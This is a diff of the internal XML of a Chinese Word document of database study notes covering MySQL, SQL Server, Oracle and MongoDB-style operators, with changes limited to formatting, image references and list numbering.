+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Rose</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Microsoft Visio...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
+        <w:spacing w:before="376" w:beforeAutospacing="0" w:after="452" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="150"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="31"/>
+          <w:szCs w:val="31"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a4"/>
+          <w:b/>
+          <w:color w:val="A52A2A"/>
+          <w:sz w:val="31"/>
+          <w:szCs w:val="31"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
+        </w:rPr>
         <w:t>关系型数据库</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="240"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12865,16 +14142,12 @@
           <w:szCs w:val="19"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>先来看看它们三个的流行趋势</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="240"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12884,7 +14157,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2768012"/>
             <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
-            <wp:docPr id="8" name="图片 1" descr="https://pic2.zhimg.com/80/v2-65fa9ab78cf17c7b1eaf6e07bc4b7755_hd.png"/>
+            <wp:docPr id="15" name="图片 1" descr="C:\Users\Administrator\Desktop\v2-65fa9ab78cf17c7b1eaf6e07bc4b7755_hd.png"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -12892,7 +14165,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 1" descr="https://pic2.zhimg.com/80/v2-65fa9ab78cf17c7b1eaf6e07bc4b7755_hd.png"/>
+                    <pic:cNvPr id="0" name="Picture 1" descr="C:\Users\Administrator\Desktop\v2-65fa9ab78cf17c7b1eaf6e07bc4b7755_hd.png"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -12930,9 +14203,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="240"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12942,7 +14212,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="1845960"/>
             <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
-            <wp:docPr id="13" name="图片 4" descr="https://pic1.zhimg.com/80/v2-2b7358add406a18c4dab5af37ca09250_hd.png"/>
+            <wp:docPr id="16" name="图片 2" descr="C:\Users\Administrator\Desktop\v2-2b7358add406a18c4dab5af37ca09250_hd.png"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -12950,7 +14220,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 4" descr="https://pic1.zhimg.com/80/v2-2b7358add406a18c4dab5af37ca09250_hd.png"/>
+                    <pic:cNvPr id="0" name="Picture 2" descr="C:\Users\Administrator\Desktop\v2-2b7358add406a18c4dab5af37ca09250_hd.png"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -13005,6 +14275,7 @@
         <w:br/>
       </w:r>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>来源：知乎</w:t>
       </w:r>
       <w:r>
@@ -13146,6 +14417,11 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -13198,7 +14474,6 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>MySQL</w:t>
       </w:r>
       <w:r>
@@ -13783,6 +15058,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>服务器端脚本</w:t>
       </w:r>
     </w:p>
@@ -13979,7 +15255,6 @@
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Microsoft SQL Server 2014</w:t>
       </w:r>
       <w:r>
@@ -14064,6 +15339,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
+        <w:spacing w:before="100" w:after="100"/>
       </w:pPr>
       <w:r>
         <w:t>Oracle</w:t>
@@ -14154,6 +15430,9 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:spacing w:before="100" w:after="100"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>总结</w:t>
@@ -14162,6 +15441,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
+        <w:spacing w:before="100" w:after="100"/>
       </w:pPr>
       <w:r>
         <w:t>Oracle</w:t>
@@ -14609,7 +15889,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>在</w:t>
       </w:r>
       <w:r>
@@ -15541,6 +16820,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>并且</w:t>
       </w:r>
       <w:r>
@@ -15979,7 +17259,6 @@
           <w:bCs/>
           <w:color w:val="0070C0"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">i   =&gt; </w:t>
       </w:r>
       <w:r>
@@ -16648,6 +17927,7 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>求当前时间 =&gt; $currentDate：{$currentDate:{&lt;field&gt;:}}</w:t>
       </w:r>
     </w:p>
@@ -17043,7 +18323,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>出栈</w:t>
       </w:r>
       <w:r>
@@ -17712,6 +18991,7 @@
         <w:widowControl/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>R</w:t>
       </w:r>
       <w:r>
@@ -18418,6 +19698,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="3799205"/>
@@ -18576,7 +19857,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t>{</w:t>
       </w:r>
@@ -18899,6 +20179,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>}</w:t>
       </w:r>
     </w:p>
@@ -27240,6 +28521,9 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="4320"/>
         </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -51714,6 +52998,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="34">
+    <w:nsid w:val="2E564F76"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E928656C"/>
+    <w:lvl w:ilvl="0" w:tplc="AC9ED8FC">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="35">
     <w:nsid w:val="3265AD81"/>
     <w:multiLevelType w:val="singleLevel"/>
     <w:tmpl w:val="3265AD81"/>
@@ -51729,7 +53102,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="35">
+  <w:abstractNum w:abstractNumId="36">
     <w:nsid w:val="3365A987"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3365A987"/>
@@ -51878,7 +53251,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="36">
+  <w:abstractNum w:abstractNumId="37">
     <w:nsid w:val="347E74BA"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="347E74BA"/>
@@ -52027,7 +53400,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="37">
+  <w:abstractNum w:abstractNumId="38">
     <w:nsid w:val="34DAC83F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="34DAC83F"/>
@@ -52176,7 +53549,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="38">
+  <w:abstractNum w:abstractNumId="39">
     <w:nsid w:val="35B5E4E7"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="35B5E4E7"/>
@@ -52325,7 +53698,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="39">
+  <w:abstractNum w:abstractNumId="40">
     <w:nsid w:val="377C9A98"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="377C9A98"/>
@@ -52474,7 +53847,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="40">
+  <w:abstractNum w:abstractNumId="41">
     <w:nsid w:val="38B460E2"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="38B460E2"/>
@@ -52623,7 +53996,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="41">
+  <w:abstractNum w:abstractNumId="42">
     <w:nsid w:val="3BF24117"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3BF24117"/>
@@ -52772,7 +54145,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="42">
+  <w:abstractNum w:abstractNumId="43">
     <w:nsid w:val="3FF5D49F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3FF5D49F"/>
@@ -52921,7 +54294,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="43">
+  <w:abstractNum w:abstractNumId="44">
     <w:nsid w:val="437C347A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B142D010"/>
@@ -53034,7 +54407,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="44">
+  <w:abstractNum w:abstractNumId="45">
     <w:nsid w:val="4D52175F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="818A2BD6"/>
@@ -53147,7 +54520,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="45">
+  <w:abstractNum w:abstractNumId="46">
     <w:nsid w:val="5231649A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="675E1C70"/>
@@ -53296,7 +54669,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="46">
+  <w:abstractNum w:abstractNumId="47">
     <w:nsid w:val="5A4FAB1A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5A4FAB1A"/>
@@ -53445,7 +54818,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="47">
+  <w:abstractNum w:abstractNumId="48">
     <w:nsid w:val="5D443934"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="57E8B89E"/>
@@ -53534,7 +54907,96 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="48">
+  <w:abstractNum w:abstractNumId="49">
+    <w:nsid w:val="61471FB5"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="26087042"/>
+    <w:lvl w:ilvl="0" w:tplc="6E981AC4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="50">
     <w:nsid w:val="639186A0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="639186A0"/>
@@ -53683,7 +55145,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="49">
+  <w:abstractNum w:abstractNumId="51">
     <w:nsid w:val="653D1365"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5DC48D9E"/>
@@ -53832,7 +55294,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="50">
+  <w:abstractNum w:abstractNumId="52">
     <w:nsid w:val="6A042BEB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="6A042BEB"/>
@@ -53981,7 +55443,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="51">
+  <w:abstractNum w:abstractNumId="53">
     <w:nsid w:val="6C7508CD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="980A5440"/>
@@ -54130,7 +55592,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="52">
+  <w:abstractNum w:abstractNumId="54">
     <w:nsid w:val="6DEB2301"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1C60F0CE"/>
@@ -54279,7 +55741,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="53">
+  <w:abstractNum w:abstractNumId="55">
     <w:nsid w:val="7A1CE74A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7A1CE74A"/>
@@ -54428,7 +55890,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="54">
+  <w:abstractNum w:abstractNumId="56">
     <w:nsid w:val="7BAD69E7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F4727B6E"/>
@@ -54518,7 +55980,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="55">
+  <w:abstractNum w:abstractNumId="57">
     <w:nsid w:val="7E1D9B84"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7E1D9B84"/>
@@ -54667,7 +56129,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="56">
+  <w:abstractNum w:abstractNumId="58">
     <w:nsid w:val="7FFE1E02"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7FFE1E02"/>
@@ -54826,7 +56288,7 @@
     <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="50"/>
+    <w:abstractNumId w:val="52"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="32"/>
@@ -54841,7 +56303,7 @@
     <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="55"/>
+    <w:abstractNumId w:val="57"/>
   </w:num>
   <w:num w:numId="10">
     <w:abstractNumId w:val="6"/>
@@ -55000,7 +56462,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="41"/>
+    <w:abstractNumId w:val="42"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="19"/>
@@ -55708,13 +57170,13 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="46">
-    <w:abstractNumId w:val="36"/>
+    <w:abstractNumId w:val="37"/>
   </w:num>
   <w:num w:numId="47">
-    <w:abstractNumId w:val="37"/>
+    <w:abstractNumId w:val="38"/>
   </w:num>
   <w:num w:numId="48">
-    <w:abstractNumId w:val="56"/>
+    <w:abstractNumId w:val="58"/>
   </w:num>
   <w:num w:numId="49">
     <w:abstractNumId w:val="3"/>
@@ -56203,10 +57665,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="67">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
   </w:num>
   <w:num w:numId="68">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56236,7 +57698,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="69">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56266,7 +57728,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="70">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56296,7 +57758,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="71">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56326,7 +57788,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="72">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56356,7 +57818,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="73">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56386,7 +57848,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="74">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56416,7 +57878,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="75">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56446,7 +57908,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="76">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56476,7 +57938,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="77">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56506,7 +57968,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="78">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56536,7 +57998,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="79">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56566,10 +58028,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="80">
-    <w:abstractNumId w:val="35"/>
+    <w:abstractNumId w:val="36"/>
   </w:num>
   <w:num w:numId="81">
-    <w:abstractNumId w:val="35"/>
+    <w:abstractNumId w:val="36"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -56755,10 +58217,10 @@
     <w:abstractNumId w:val="33"/>
   </w:num>
   <w:num w:numId="89">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="50"/>
   </w:num>
   <w:num w:numId="90">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="50"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
